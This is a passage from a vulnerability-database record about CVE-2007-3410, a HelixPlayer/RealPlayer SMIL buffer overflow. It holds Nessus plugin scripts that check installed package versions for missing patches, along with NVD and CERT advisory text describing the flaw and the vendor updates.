{"published": "2012-08-01T00:00:00", "id": "SL_20070627_HELIXPLAYER_ON_SL4_X.NASL", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [{"differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:07", "bulletin": {"enchantments": {}, "published": "2012-08-01T00:00:00", "id": "SL_20070627_HELIXPLAYER_ON_SL4_X.NASL", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "cpe": [], "hash": "4ed351559b9fd3c7e9fb1727fb472c853cbb9ed5ac707c07d223c2d37581571f", "description": "A buffer overflow flaw was found in the way HelixPlayer processed Synchronized Multimedia Integration Language (SMIL) files. It was possible for a malformed SMIL file to execute arbitrary code with the permissions of the user running HelixPlayer. (CVE-2007-3410)", "type": "nessus", "pluginID": "60220", "lastseen": "2016-09-26T17:23:07", "edition": 1, "title": "Scientific Linux Security Update : HelixPlayer on SL4.x i386/x86_64", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60220", "modified": "2015-01-15T00:00:00", "bulletinFamily": "scanner", "viewCount": 0, "cvelist": ["CVE-2007-3410"], "references": ["http://www.nessus.org/u?7975e86f"], "naslFamily": "Scientific Linux Local Security Checks", "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60220);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/01/15 16:37:17 $\");\n\n script_cve_id(\"CVE-2007-3410\");\n\n script_name(english:\"Scientific Linux Security Update : HelixPlayer on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw was found in the way HelixPlayer processed\nSynchronized Multimedia Integration Language (SMIL) files. It was\npossible for a malformed SMIL file to execute arbitrary code with the\npermissions of the user running HelixPlayer. (CVE-2007-3410)\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind0706&L=scientific-linux-errata&T=0&P=3791\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7975e86f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected HelixPlayer package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "hashmap": [{"hash": "8a85424ffa4731b6b720ad81529796fd", "key": "sourceData"}, {"hash": "c459074115a427141f584ccc9fd3d8cc", "key": "href"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ff9b401529ad052db50e89f363430ebc", "key": "pluginID"}, {"hash": "5a702aacd945b32ecec20a7ee647fb31", "key": "modified"}, {"hash": "b3a4d461a1383c8ba9fa401b58d29827", "key": "naslFamily"}, {"hash": "0701beb1b3fbc3538c67e3a64501b32d", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "afff7b4f79cb0279de5b40b664d6bb49", "key": "cvelist"}, {"hash": "56ae65b1e750f6620542172d23096512", "key": "title"}, {"hash": "3ff4afbf9eedf98937c2e5c5cf13456f", "key": "published"}, {"hash": "de8e6d6855da599533fc924ac23a0bca", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "objectVersion": "1.2"}}], "description": "A buffer overflow flaw was found in the way HelixPlayer processed Synchronized Multimedia Integration Language (SMIL) files. It was possible for a malformed SMIL file to execute arbitrary code with the permissions of the user running HelixPlayer. (CVE-2007-3410)", "hash": "29769c5329ccd7741b5d4015211494316044cc353f9b9fe2ac1f10852cb14a3f", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "nessus", "pluginID": "60220", "lastseen": "2017-10-29T13:33:11", "edition": 2, "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "title": "Scientific Linux Security Update : HelixPlayer on SL4.x i386/x86_64", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60220", "modified": "2015-01-15T00:00:00", "bulletinFamily": "scanner", "viewCount": 0, "cvelist": ["CVE-2007-3410"], "references": ["http://www.nessus.org/u?7975e86f"], "naslFamily": "Scientific Linux Local Security Checks", "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60220);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/01/15 16:37:17 $\");\n\n script_cve_id(\"CVE-2007-3410\");\n\n script_name(english:\"Scientific Linux Security Update : HelixPlayer on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw was found in the way HelixPlayer processed\nSynchronized Multimedia Integration Language (SMIL) files. It was\npossible for a malformed SMIL file to execute arbitrary code with the\npermissions of the user running HelixPlayer. (CVE-2007-3410)\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind0706&L=scientific-linux-errata&T=0&P=3791\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7975e86f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected HelixPlayer package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "hashmap": [{"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "b1e432cd926620a2b9bd9816ef9503c6", "key": "cpe"}, {"hash": "afff7b4f79cb0279de5b40b664d6bb49", "key": "cvelist"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "0701beb1b3fbc3538c67e3a64501b32d", "key": "description"}, {"hash": "c459074115a427141f584ccc9fd3d8cc", "key": "href"}, {"hash": "5a702aacd945b32ecec20a7ee647fb31", "key": "modified"}, {"hash": "b3a4d461a1383c8ba9fa401b58d29827", "key": "naslFamily"}, {"hash": "ff9b401529ad052db50e89f363430ebc", "key": "pluginID"}, {"hash": "3ff4afbf9eedf98937c2e5c5cf13456f", "key": "published"}, {"hash": "de8e6d6855da599533fc924ac23a0bca", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8a85424ffa4731b6b720ad81529796fd", "key": "sourceData"}, {"hash": "56ae65b1e750f6620542172d23096512", "key": "title"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}], "objectVersion": "1.3"}

{"result": {"cve": [{"lastseen": "2017-10-11T11:07:13", "references": ["http://www.attrition.org/pipermail/vim/2007-October/001841.html", "http://security.gentoo.org/glsa/glsa-200709-05.xml", "http://www.redhat.com/support/errata/RHSA-2007-0841.html", "http://www.vupen.com/english/advisories/2007/3628", "http://securitytracker.com/id?1018299", "http://www.securityfocus.com/bid/24658", "http://service.real.com/realplayer/security/10252007_player/en/", "http://www.vupen.com/english/advisories/2007/2339", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547", "http://securitytracker.com/id?1018297", "https://exchange.xforce.ibmcloud.com/vulnerabilities/35088", "http://www.redhat.com/support/errata/RHSA-2007-0605.html", "http://www.kb.cert.org/vuls/id/770904"], "description": "Stack-based buffer overflow in the SmilTimeValue::parseWallClockValue function in smlprstime.cpp in RealNetworks RealPlayer 10, 10.1, and possibly 10.5, RealOne Player, RealPlayer Enterprise, and Helix Player 10.5-GOLD and 10.0.5 through 10.0.8, allows remote attackers to execute arbitrary code via an SMIL (SMIL2) file with a long wallclock value.", "edition": 3, "reporter": "NVD", "published": "2007-06-26T18:30:00", "title": "CVE-2007-3410", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:07:13", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10554", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10554"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-3410"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10554", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10554"}], "modified": "2017-10-10T21:32:47", "cpe": ["cpe:/a:realnetworks:realplayer:10.1", "cpe:/a:realnetworks:helix_player:10.0.7", "cpe:/a:realnetworks:realplayer:10.0", "cpe:/a:realnetworks:helix_player:10.0.5", "cpe:/a:realnetworks:helix_player:10.0.8", "cpe:/a:realnetworks:realone_player", "cpe:/a:realnetworks:helix_player:10.0.6", "cpe:/a:realnetworks:realplayer:10.5", "cpe:/a:realnetworks:helix_player:10.5-gold", "cpe:/a:realnetworks:realplayer_enterprise"], "id": "CVE-2007-3410", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3410", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-08-02T21:57:54", "references": ["https://player.helixcommunity.org/", "http://www.real.com/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3410", "http://real.custhelp.com/cgi-bin/real.cfg/php/enduser/std_adp.php?p_faqid=6929", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547", "http://www.w3.org/TR/SMIL/", "http://www.realplayer.com/"], "description": "### Overview\n\nA buffer overflow in RealNetworks media players could allow a remote attacker to execute arbitrary code on an affected system.\n\n### Description\n\nThe [RealNetworks](<http://www.real.com/>) [RealPlayer](<http://www.realplayer.com/>) and [Helix Player](<https://player.helixcommunity.org/>) applications allow users to view local and remote audio and video content. These players support multiple media formats including the synchronized multimedia integration language ([SMIL](<http://www.w3.org/TR/SMIL/>)). A stack-based buffer overflow exists in the way that these players handle the \"wallclock-sync\" values encoded in the SMIL data. A remote attacker with the ability to supply a specially crafted media file or stream could exploit this vulnerability to execute arbitrary code on an affected system. \n\nNote that we are aware of publicly-available exploit code for this vulnerability. \n \n--- \n \n### Impact\n\nA remote unauthenticated attacker could execute arbitrary code with the privileges of the user running a vulnerable application or cause the vulnerable application to crash, resulting in a denial of service. \n \n--- \n \n### Solution\n\n**Apply an update from the vendor** \n \nThe latest versions of the affected software available at the time of this writing are reported to contain a patch for this issue. Users of RealPlayer are encouraged to take the following steps to update: \n\n * Windows users are encouraged to follow the steps outlined in [RealNetworks support document Answer ID 6929](<http://real.custhelp.com/cgi-bin/real.cfg/php/enduser/std_adp.php?p_faqid=6929>)\n * RealPlayer for Mac OS X users should take the following steps: \n1\\. Go the RealPlayer menu. \n2\\. Choose Check for Update. \n3\\. Select the box next to the \"RealPlayer 10 Latest Release\" component. \n4\\. Click Install to download and install the update \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nRealNetworks, Inc.| | 27 Jun 2007| 28 Jun 2007 \nRed Hat, Inc.| | -| 27 Jun 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23770904 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547>\n\n### Credit\n\nThis vulnerability was reported by iDefense Labs in iDefense Labs Public Advisory: 06.26.07 . iDefense credits an anonymous researcher with reporting this vulnerability to them.\n\nThis document was written by Chad R Dougherty.\n\n### Other Information\n\n * CVE IDs: [CVE-2007-3410](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3410>)\n * Date Public: 26 Jun 2007\n * Date First Published: 28 Jun 2007\n * Date Last Updated: 28 Jun 2007\n * Severity Metric: 22.27\n * Document Revision: 5\n\n", "edition": 2, "reporter": "CERT", "published": "2007-06-28T00:00:00", "title": "RealNetworks players SMIL \"wallclock\" buffer overflow", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2007-3410", "CVE-2007-3410"], "modified": "2007-06-28T00:00:00", "id": "VU:770904", "href": "https://www.kb.cert.org/vuls/id/770904", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2017-10-29T13:42:58", "references": ["http://www.nessus.org/u?e4b54f98", "http://www.nessus.org/u?0affccca"], "pluginID": "27679", "description": "A buffer overflow flaw was discovered in the way RealPlayer and HelixPlayer handle the wallclock variable in Synchronized Multimedia Integration Language (SMIL) files.\n\nMore information regarding this flaw can be found here:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=5 47\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "reporter": "Tenable", "published": "2007-11-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "nessus", "title": "Fedora 7 : HelixPlayer-1.0.7-6.fc7 (2007-0756)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:HelixPlayer-plugin", "p-cpe:/a:fedoraproject:fedora:HelixPlayer-debuginfo", "p-cpe:/a:fedoraproject:fedora:HelixPlayer"], "modified": "2015-10-21T00:00:00", "id": "FEDORA_2007-0756.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27679", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-0756.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27679);\n script_version (\"$Revision: 1.22 $\");\n script_cvs_date(\"$Date: 2015/10/21 21:46:28 $\");\n\n script_cve_id(\"CVE-2007-3410\");\n script_xref(name:\"FEDORA\", value:\"2007-0756\");\n\n script_name(english:\"Fedora 7 : HelixPlayer-1.0.7-6.fc7 (2007-0756)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow flaw was discovered in the way RealPlayer and\nHelixPlayer handle the wallclock variable in Synchronized Multimedia\nIntegration Language (SMIL) files.\n\nMore information regarding this flaw can be found here:\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=5\n47\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=547\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0affccca\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-June/002450.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4b54f98\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected HelixPlayer, HelixPlayer-debuginfo and / or\nHelixPlayer-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:HelixPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:HelixPlayer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:HelixPlayer-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"HelixPlayer-1.0.7-6.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"HelixPlayer-debuginfo-1.0.7-6.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"HelixPlayer-plugin-1.0.7-6.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HelixPlayer / HelixPlayer-debuginfo / HelixPlayer-plugin\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-15T15:18:12", "references": ["https://oss.oracle.com/pipermail/el-errata/2007-June/000254.html"], "pluginID": "67538", "description": "From Red Hat Security Advisory 2007:0605 :\n\nAn updated HelixPlayer package that fixes a buffer overflow flaw is now available.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA buffer overflow flaw was found in the way HelixPlayer processed Synchronized Multimedia Integration Language (SMIL) files. It was possible for a malformed SMIL file to execute arbitrary code with the permissions of the user running HelixPlayer. (CVE-2007-3410)\n\nAll users of HelixPlayer are advised to upgrade to this updated package, which contains a backported patch and is not vulnerable to this issue.", "edition": 3, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : HelixPlayer (ELSA-2007-0605)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-3410"], "modified": "2018-08-13T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:HelixPlayer", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2007-0605.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67538", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0605 and \n# Oracle Linux Security Advisory ELSA-2007-0605 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67538);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/08/13 14:32:36\");\n\n script_cve_id(\"CVE-2007-3410\");\n script_xref(name:\"RHSA\", value:\"2007:0605\");\n\n script_name(english:\"Oracle Linux 4 : HelixPlayer (ELSA-2007-0605)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0605 :\n\nAn updated HelixPlayer package that fixes a buffer overflow flaw is\nnow available.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nHelixPlayer is a media player.\n\nA buffer overflow flaw was found in the way HelixPlayer processed\nSynchronized Multimedia Integration Language (SMIL) files. It was\npossible for a malformed SMIL file to execute arbitrary code with the\npermissions of the user running HelixPlayer. (CVE-2007-3410)\n\nAll users of HelixPlayer are advised to upgrade to this updated\npackage, which contains a backported patch and is not vulnerable to\nthis issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-June/000254.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected helixplayer package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:HelixPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"HelixPlayer-1.0.6-0.EL4.2.0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 